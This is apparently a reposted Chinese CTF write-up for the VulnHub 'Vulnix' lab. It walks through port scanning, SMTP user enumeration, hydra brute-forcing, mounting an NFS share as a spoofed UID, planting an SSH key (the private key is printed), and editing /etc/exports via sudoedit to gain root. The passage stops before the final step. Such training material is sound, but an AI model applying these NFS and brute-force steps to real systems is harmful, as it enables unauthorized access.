当前位置：网站首页 > 网络安全培训 > 正文

CTF靶场系列-Vulnix

freebuf 2019-07-15 284 0

本文来源:

下载地址

https://download.vulnhub.com/hacklab/Vulnix.7z

实战演练

使用netdiscover找到IP

使用nmap查找开放的端口

靶机开放25端口，试试枚举一下smtp账号

使用hydra爆破user账号

使用user账号登录靶机，su提权，失败。

靶机开放了2049端口(nfs)

NFS（Network File System）即网络文件系统，是FreeBSD支持的文件系统中的一种，它允许网络中的计算机之间共享资源。在NFS的应用中，本地NFS的客户端应用可以透明地读写位于远端NFS服务器上的文件，就像访问本地文件一样。

showmount命令用于查询NFS服务器的相关信息。kali没有自带showmount，需要自己安装。apt install nfs-common

# showmount --help 　　Usage： showmount ［-adehv］ 　　［--all］ ［--directories］ ［--exports］ 　　［--no-headers］ ［--help］ ［--version］ ［host］ 　　-a或--all 　　以 host:dir 这样的格式来显示客户主机名和挂载点目录。 　　-d或--directories 　　仅显示被客户挂载的目录名。 　　-e或--exports 　　显示NFS服务器的输出清单。 　　-h或--help 　　显示帮助信息。 　　-v或--version 　　显示版本信。 　　--no-headers 　　禁止输出描述头部信息。 　　显示NFS客户端信息 　　# showmount 　　显示指定NFS服务器连接NFS客户端的信息 　　# showmount 192.168.1.1 #此ip为nfs服务器的 　　显示输出目录列表 　　# showmount -e 　　显示指定NFS服务器输出目录列表（也称为共享目录列表） 　　# showmount -e 192.168.1.1 　　显示被挂载的共享目录 　　# showmount -d 　　显示客户端信息和共享目录 　　# showmount -a 　　显示指定NFS服务器的客户端信息和共享目录 　　# showmount -a 192.168.1.1

输出清单

kali:~# showmount -e 192.168.0.104 Export list for 192.168.0.104: /home/vulnix * root@kali:~#

挂载NFS，进入之后提示，权限不够

root@kali:~# mkdir /tmp/mount root@kali:~# mount -t nfs  192.168.0.104:/home/vulnix /tmp/mount/ root@kali:~# cd /tmp/mount/ bash: cd: /tmp/mount/: Permission denied

之前ssh连接上的user账号，查看passwd，vulnix账号的UID为2008

创建一个相同的UID账号，就可以登录进去

root@kali:/tmp# useradd -u 2008 vulnix root@kali:/tmp# su vulnix $ /bin/bash vulnix@kali:/tmp$ cd mount vulnix@kali:/tmp/mount$ ls -al total 24 drwxr-x---  3 nobody 4294967294 4096 Jul 15 00:57 . drwxrwxrwt 21 root   root       4096 Jul 15 01:03 .. -rw-r--r--  1 nobody 4294967294  220 Apr  3  2012 .bash_logout -rw-r--r--  1 nobody 4294967294 3486 Apr  3  2012 .bashrc -rw-r--r--  1 nobody 4294967294  675 Apr  3  2012 .profile

创建SSH证书

vulnix@kali:/tmp/mount$ mkdir .ssh vulnix@kali:/tmp/mount$ cd .ssh vulnix@kali:/tmp/mount/.ssh$ ssh-keygen Generating public/private rsa key pair. Enter file in which to save the key (/home/vulnix/.ssh/id_rsa): ./id_rsa Enter passphrase (empty for no passphrase):  Enter same passphrase again:  Your identification has been saved in ./id_rsa. Your public key has been saved in ./id_rsa.pub. The key fingerprint is: SHA256:1BbCHz69p0pTY7LPWUi6nAxa0Jg9fx/RAANPfJL6ZQI vulnix@kali The key's randomart image is: +---[RSA 2048]----+ |       .. oo+.   | |        .oE++o.  | |        .oo=.o.  | |       * .= o oo | |      + S .o==. .| |       . o Boo.. | |        o * ooo  | |       o = B.+ . | |      .   *.+ .  | +----[SHA256]-----+ vulnix@kali:/tmp/mount/.ssh$ ls -al total 16 drwxr-xr-x 2 nobody 4294967294 4096 Jul 15 01:07 . drwxr-x--- 3 nobody 4294967294 4096 Jul 15 01:06 .. -rw------- 1 nobody 4294967294 1823 Jul 15 01:07 id_rsa -rw-r--r-- 1 nobody 4294967294  393 Jul 15 01:07 id_rsa.pub

复制私钥

vulnix@kali:/tmp/mount/.ssh$ mv id_rsa.pub authorized_keys vulnix@kali:/tmp/mount/.ssh$ cat id_rsa  -----BEGIN OPENSSH PRIVATE KEY----- b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn NhAAAAAwEAAQAAAQEA3HaRqr2UAtlR3vE9x1RHN8bUdldnu9CtGy9Pkw6P5f7BSeDGCXjk 1oJfdcSvzAH7g6Llbrtwi9HiNQtJz+0z8c9eIeFpBsFtzuMRcVubzlfYlYhAv41TqZPUkm PKNXmaIIoPgRRN4ID2wMc1BLk5Q7SOAHv+Ef0yVg/6EI8u2SB8l0Iqd/1naHXBwXZsh4bk OkmPdnCdYaX5FtF7wrcCyMjC577b0K935a0I9uhJ8eyJovktxZKiZrZh6h579QFE3zGXm+ p9st2uooI2C4sPBNlGEeqTbTzQNb8iS7KVxDn1UfG1ljSOlYNs7txSpt7fHvAloPt9iWar GDaEVuTODQAAA8jjNfe/4zX3vwAAAAdzc2gtcnNhAAABAQDcdpGqvZQC2VHe8T3HVEc3xt R2V2e70K0bL0+TDo/l/sFJ4MYJeOTWgl91xK/MAfuDouVuu3CL0eI1C0nP7TPxz14h4WkG wW3O4xFxW5vOV9iViEC/jVOpk9SSY8o1eZogig+BFE3ggPbAxzUEuTlDtI4Ae/4R/TJWD/ oQjy7ZIHyXQip3/WdodcHBdmyHhuQ6SY92cJ1hpfkW0XvCtwLIyMLnvtvQr3flrQj26Enx 7Imi+S3FkqJmtmHqHnv1AUTfMZeb6n2y3a6igjYLiw8E2UYR6pNtPNA1vyJLspXEOfVR8b WWNI6Vg2zu3FKm3t8e8CWg+32JZqsYNoRW5M4NAAAAAwEAAQAAAQBGg94/wHdxGdWn+32J HhnRa1VVrMtPNYXI5i8LmGLKa9ujJ7PwH60CN50U7B5WoGO0TQwZiPaMoks6MCwhx3sP4w X2zERtlrzqqZJQsb56F3r9CSG8oxWZbeFWGXj59bUop0AiRz5JirZiHtWEd0Irt7qbyQ0Q 7+2DvYR8e2++np8btSNyJJIc5wvvlh0h7KYr5RYVEdAylbEdCLzJaRtt8tWTbr+waUg2A4 fNlWRBZTPuFvwRD2JQG6U5KOmRbXEZVfIO0gEjxjjoG8IKIHb/UYT7AQopARi3NfuWWHYV jbUsl4aiIBWa8H6X1BBpVROKpslPxkOa/4FmikJ+D3RBAAAAgQC1DDJj0xuNtHvFVmOvy7 V/ISjVFIlWe1Vo/2eOrt9vyXf9FsBUfgGzG6HHnNERXVpUtrgJtYHYV68tBh0BKFhgg1X/ Z5g0z0rIMKtwjFwRsv8NHz6Rs8DyDeiGEfNcVHcE05oKSVjWs7oZMG4LYLUFzldwM96MKC 6RHR79f+rMHAAAAIEA/2iohngAKm+6j8IgHAku83wrSQ4VdVunwwegiY2olFLAzNgNTfVY Ib40yMR8bjC2YdVfIVrUIk4ItWRQ1hihBNeQgSdni76mCY/4CvpUShab2XysAMYWQBuORj +Kw1+DpaYR1ftIG1XfqeU6jVFTEgUdK/WogZzUIcvEgM1kkskAAACBANz5NCoaUb7+PLYt uEyiRoxsAo2B4bLy5NZNy2/4dXiPZ9XwYGZrohHk/NUtQMZAQNyn1EzymoFfagZANuMQ7T ODvr9L/UqL9EWdabrVyAlMnMa61aDRqNNdjAElMNRY5JaGbBVSAXvI7qezsjr/WyK237OD aywsPDaFbvK0S18lAAAAC3Z1bG5peEBrYWxpAQIDBAUGBw== -----END OPENSSH PRIVATE KEY-----

使用私钥进行登录，如果提示安全问题，需要修改私钥的权限

查看账号权限

vulnix@vulnix:~$ sudo -l Matching 'Defaults' entries for vulnix on this host:     env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin  User vulnix may run the following commands on this host:     (root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit /etc/exports

sudoedit /etc/exports，添加这一行，nfs开放root目录

再物理重启靶机VM，让NFS读取这个配置文件